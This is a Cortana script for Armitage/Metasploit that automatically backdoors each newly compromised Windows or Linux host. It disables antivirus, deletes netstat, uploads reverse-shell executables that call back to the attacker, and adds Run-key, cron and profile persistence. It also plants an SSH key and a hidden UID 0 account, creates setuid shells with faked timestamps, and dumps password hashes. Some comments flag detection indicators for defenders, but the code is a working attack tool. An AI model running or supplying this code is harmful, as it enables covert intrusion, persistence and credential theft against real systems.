- # Script to install/hide a few shells/accounts
- # To Do
- # Check for root
- # Encode payloads
- # Filter bad addresses on load
- # Add dns server
- # add infolinkd.dll
- # Update hosts file with fake entries to break patching (evil grade?)
- # Author: __int128
- # Per-host marker: session_open sets %infected[host] = "1" once a host has
- # been processed, and host_bottom uses the same key to show the reconnect
- # menu item. Declared global so every handler below sees the same hash.
- global('%infected');
- $addresses = @();
- # Hard-coded account used for the RDP/telnet creds entries in session_open.
- # Defender note: the user name "lls_USER" is itself a findable artifact in a
- # local-account audit.
- $win_user = 'lls_USER';
- $win_pass = '@pplesauc3';
- # Address of the Armitage/Metasploit host, reused for handler LHOSTs.
- $local_ip = lhost();
- # Source for the random 5-letter file names built in session_open; because
- # the names differ per run, detections should key on locations/behaviour.
- @alphabet = @("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z");
- # On startup, collect the local IPv4 addresses of the Metasploit host.
- # session_open later creates one reverse handler per address in @addresses.
- on ready {
- # $3 is presumably the captured console output of the command — confirm
- # against the Cortana console_* event documentation.
- on console_ifconfig {
- @addresses = split("\n", $3);
- }
- cmd_async('ifconfig | grep "inet addr" | cut -d ":" -f 2 | cut -d " " -f 1');
- }
- # Fires for every new session. Hosts not yet marked in %infected are handled
- # by an OS-specific branch (Windows meterpreter, Linux shell). Each branch
- # leaves durable host artifacts — services, registry Run values, cron
- # entries, extra accounts, immutable files, setuid shells — that are called
- # out in the comments below as detection anchors.
- on session_open {
- $rhost = session_host($1);
- # Skip hosts already processed in this run (marker set inside each branch).
- if (%infected[session_host($1)] != "1") {
- if (host_os(session_host($1)) eq "Microsoft Windows") {
- # A plain shell is only upgraded here; the marker is not set, so the
- # resulting meterpreter session is presumably handled on its own
- # session_open event.
- if(-isshell $1) {
- cmd_async("sessions -u $1");
- }
- if(-iswinmeterpreter $1) {
- say("Infecting " . session_host($1));
- %infected[session_host($1)] = "1";
- # Privilege escalation, AV tampering, then metsvc — a persistent service;
- # the bind handler on port 31337 at the end of this branch talks to it.
- # Defender note: a new service plus a listener on TCP 31337 is an anchor.
- m_cmd($1, "getsystem");
- m_cmd($1, "run killav");
- m_cmd($1, "run metsvc");
- # delete netstat
- # Defender note: a missing %SystemRoot%\System32\netstat.exe is a tamper
- # indicator on its own.
- m_cmd($1, "del c:\\Windows\\System32\\netstat.exe");
- # Generate Payload(s)
- # Random 5-letter names for the raw stage file and the final .exe.
- $r_lport_a = random_port();
- $r_name = rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . ".raw";
- $r_backdoor = rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . ".exe";
- createNewFile("/tmp/$r_name");
- # One raw reverse-shell stage per local address, all appended to $r_name.
- foreach $address (@addresses) {
- # Validate its an address
- if("$address" ismatch '\d+\.\d+\.\d+\.\d+') {
- # Filter out unwanted addresses # should really be done above
- if(("127.0.0.1" !iswm $address) && ("192.168.197.1" !iswm $address) && ("172.16.49.1" !iswm $address)) {
- $raw = generate("windows/shell_reverse_tcp", $address, $r_lport_a, %(EXITFUNC => "none", Encoder => "generic/none"), "raw");
- # remove last two bytes of windows payload
- # Credit to HDMoore for the idea
- $raw = substr($raw, 0, strlen($raw)-2);
- $handle = openf(">>/tmp/$r_name");
- writeb($handle, $raw);
- closef($handle);
- }
- }
- }
- #deleteFile("/tmp/update.exe");
- # Wrap the concatenated raw file into a PE; no encoder is applied.
- exec("msfencode -i /tmp/$r_name -p windows -a x86 -e generic/none -t exe -o /tmp/$r_backdoor");
- #sleep so that the payload can be generated
- # Fixed-plus-random wait (30-90 s) for msfencode to finish.
- sleep((30 + rand(60)) * 1000);
- # Drop the executable into System32 and register it under the HKLM Run key.
- # Defender note: a Run value named "update" pointing at a random 5-letter
- # .exe in System32 is a high-fidelity indicator of this tooling.
- m_cd($1, 'c:\Windows\System32');
- m_upload($1, "/tmp/$r_backdoor");
- m_cmd($1, "reg setval -k HKLM\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run -v update -d \"c:\\\\Windows\\\\System32\\\\$r_backdoor\"");
- # One persistence entry per local address, each on a fresh random port with
- # its own handler (-X start at boot, -i 60 reconnect interval, -r callback
- # host — confirm against the persistence script's option help).
- foreach $address (@addresses) {
- if(("127.0.0.1" !iswm $address) && ("192.168.197.1" !iswm $address) && ("172.16.49.1" !iswm $address)) {
- $r_lport_b = random_port();
- m_cmd($1, "run persistence -X -i 60 -p $r_lport_b -r $address");
- handler("windows/meterpreter/reverse_tcp", $r_lport_b, %(LHOST => $address, ExitOnSession => "false"));
- }
- }
- # Enable RDP (getgui) and telnet (gettelnet) with a local account.
- # Defender note: RDP/telnet newly enabled together with a new local account
- # on a workstation is a strong signal; the creds entries below record the
- # account in the Armitage database.
- m_cmd($1, "run getgui -u $backdoor_user -p $backdoor_pass");
- m_cmd($1, "run gettelnet -u $backdoor_user -p $backdoor_pass");
- $rdp = "creds --add " . session_host($1) . " -p 3389 -u $win_user -P $win_pass";
- cmd_async($rdp);
- $tel = "creds --add " . session_host($1) . " -p 23 -u $win_user -P $win_pass";
- cmd_async($tel);
- # Listeners: the shell stage on $r_lport_a (spawns meterpreter on connect)
- # and a bind handler to the metsvc service installed above on 31337.
- handler("windows/shell_reverse_tcp", $r_lport_a, %(LHOST => "0.0.0.0", ExitOnSession => "false", AutoRunScript => "spawn_meterpreter"));
- handler("windows/metsvc_bind_tcp", "31337", %(LHOST => lhost(), RHOST => $rhost));
- m_cmd($1, "run hashdump");
- say("Done Infecting " . session_host($1));
- }
- }
- else if (host_os(session_host($1)) eq "Linux") {
- if (-isshell $1) {
- say("Infecting " . session_host($1));
- %infected[session_host($1)] = "1";
- # Removing netstat
- # Defender note: a missing /bin/netstat is a tamper indicator.
- s_cmd($1, "rm -rf /bin/netstat");
- # Append the Armitage DSA public key (read from the msf3 data directory)
- # to root's authorized_keys; the ssh_login_pubkey call at the end of this
- # branch relies on it.
- s_cmd($1, "mkdir /root/.ssh");
- # on load prompt for keys or generate?
- $handle = openf("/opt/metasploit/msf3/data/armitage/id_dsa.pub");
- $pub_key = readln($handle);
- s_cmd($1, "echo $pub_key >> /root/.ssh/authorized_keys");
- closef($handle);
- # Second UID 0 account "administrator" with home "/" appended to shadow
- # and passwd. Defender note: duplicate UID 0 entries and a root-equivalent
- # user whose home is "/" are high-fidelity indicators.
- s_cmd($1, "echo 'administrator:\$6\$W6D9sKYe\$tPihBsmoYXNNBfDhmkT30tYqMdCtMN.zn9HpczbzVd0YMw9P5dAQnjQ4KqUN/4IG5xs4t1SUZP5k82vi5UWGc0:15578:0:99999:7:::' >> /etc/shadow"); # pass = abc123
- s_cmd($1, "echo 'administrator:x:0:0:nobody,,,,:/:/bin/bash' >>/etc/passwd");
- $ssh = "creds --add " . session_host($1) . " -p 22 -u administrator -P abc123";
- cmd_async($ssh);
- # Generate Payload
- # Same raw-stage loop as the Windows branch, but no trailing-byte trim and
- # an ELF is produced.
- $r_lport = random_port();
- $r_name = rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . ".raw";
- $r_backdoor = rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet);
- createNewFile("/tmp/$r_name");
- foreach $address (@addresses) {
- # Validate its an address
- if("$address" ismatch '\d+\.\d+\.\d+\.\d+') {
- # Filter out unwanted addresses # should really be done above
- if(("127.0.0.1" !iswm $address) && ("192.168.197.1" !iswm $address) && ("172.16.49.1" !iswm $address)) {
- $raw = generate("linux/x86/shell_reverse_tcp", $address, $r_lport, %(EXITFUNC => "none", Encoder => "generic/none"), "raw");
- $handle = openf(">>/tmp/$r_name");
- writeb($handle, $raw);
- closef($handle);
- }
- }
- }
- #deleteFile("/tmp/linux_backdoor");
- exec("msfencode -i /tmp/$r_name -p linux -a x86 -e generic/none -t elf -o /tmp/$r_backdoor");
- sleep ((30 + rand(60)) * 1000 );
- #deleteFile("/tmp/$r_name");
- # set cron job
- # Cron persistence: /etc/cron.5min/dpkg is run every 15 minutes from both
- # /etc/crontab and root's crontab, then made immutable. Defender note:
- # /etc/cron.5min is not a stock directory, and `lsattr` shows the +i flag.
- s_cmd($1, "mkdir /etc/cron.5min");
- s_cmd($1, "echo '*/15 * * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.5min )' >> /etc/crontab");
- s_cmd($1, "echo '*/15 * * * * /etc/cron.5min/dpkg' >> /var/spool/cron/crontabs/root");
- s_cmd($1, "chmod 0600 /etc/crontab /etc/cron.5min /var/spool/cron/crontabs/root");
- shell_upload($1, "/tmp/$r_backdoor", "/etc/cron.5min/dpkg");
- s_cmd($1, "chmod 755 /etc/cron.5min/dpkg")
- s_cmd($1, "chattr +i /etc/cron.5min/dpkg");
- # set profile
- # Login persistence: /usr/bin/ufw is replaced by the ELF and launched from
- # /etc/profile and /etc/skel/.profile; all three are made immutable.
- # Defender note: package-file integrity checks flag the modified ufw
- # binary, and an immutable /etc/profile is abnormal.
- shell_upload($1, "/tmp/$r_backdoor", "/usr/bin/ufw");
- s_cmd($1, "chmod 775 /usr/bin/ufw");
- s_cmd($1, "echo '/usr/bin/ufw &' >>/etc/profile");
- s_cmd($1, "echo '/usr/bin/ufw &' >>/etc/skel/.profile");
- s_cmd($1, "chattr +i /usr/bin/ufw /etc/profile /etc/skel/.profile");
- # Create Backup Shell
- # Setuid copies of zsh and tcsh at /.kernel and /tmp/X11.auth with the
- # mtime reset to 4 May 2004 (/.kernel also immutable). Defender note:
- # setuid files directly under / or /tmp are findable with `find -perm`;
- # the old timestamp is meant to blend into listings, not to defeat that.
- s_cmd($1, "cp /bin/zsh /.kernel; chmod +sss /.kernel; touch -d '4 May 2004' /.kernel; chattr +i /.kernel");
- s_cmd($1, "cp /bin/tcsh /tmp/X11.auth; chmod +sss /tmp/X11.auth; touch -d '4 May 2004' /tmp/X11.auth");
- # Launch our aux shells
- # Reverse handler for the ELF stage, then two ssh logins: key-based as root
- # (key planted above) and password-based as "administrator".
- handler("linux/x86/shell_reverse_tcp", $r_lport, %(LHOST => "0.0.0.0", ExitOnSession => "false"));
- auxiliary("scanner/ssh/ssh_login_pubkey", @($rhost), %(USERNAME => 'root', KEY_FILE => '/opt/metasploit/msf3/data/armitage/id_dsa'));
- login("scanner/ssh/ssh_login", @($rhost), "administrator", "abc123", %(LHOST => lhost(), LPORT => random_port()));
- # Get hashes
- launch("post", "linux/gather/hashdump", %(SESSION => "$1"));
- db_sync();
- say("Done Infecting " . session_host($1));
- }
- }
- else {
- say("Failed to infect " . session_host($1) . ":" . host_os(session_host($1)));
- }
- }
- else {
- # Already-marked host: the shell upgrade is intentionally disabled here
- # (see the comment below for the author's reason).
- if (host_os(session_host($1)) eq "Microsoft Windows") {
- if(-isshell $1) {
- # can not upgrade due to sessions binding to 0.0.0.0 and port already listening due to persistant listeners
- #cmd_async("sessions -u $1");
- }
- }
- }
- }
- # Host context-menu entry, shown only for hosts marked in %infected.
- # Reconnects through the artifacts left by session_open: the metsvc bind
- # service on 31337 (Windows) or the planted ssh key / "administrator"
- # account (Linux).
- popup host_bottom {
- $rhost = $1;
- if (%infected[$1] == "1") {
- item "Re-establish connection" {
- if (host_os($1) eq "Microsoft Windows") {
- handler("windows/metsvc_bind_tcp", "31337", %(LHOST => lhost(), RHOST => $rhost));
- }
- if (host_os($1) eq "Linux") {
- auxiliary("scanner/ssh/ssh_login_pubkey", @($rhost), %(USERNAME => 'root', KEY_FILE => '/opt/metasploit/msf3/data/armitage/id_dsa'));
- login("scanner/ssh/ssh_login", @($rhost), "administrator", "abc123", %(LHOST => lhost(), LPORT => random_port()));
- }
- }
- }
- }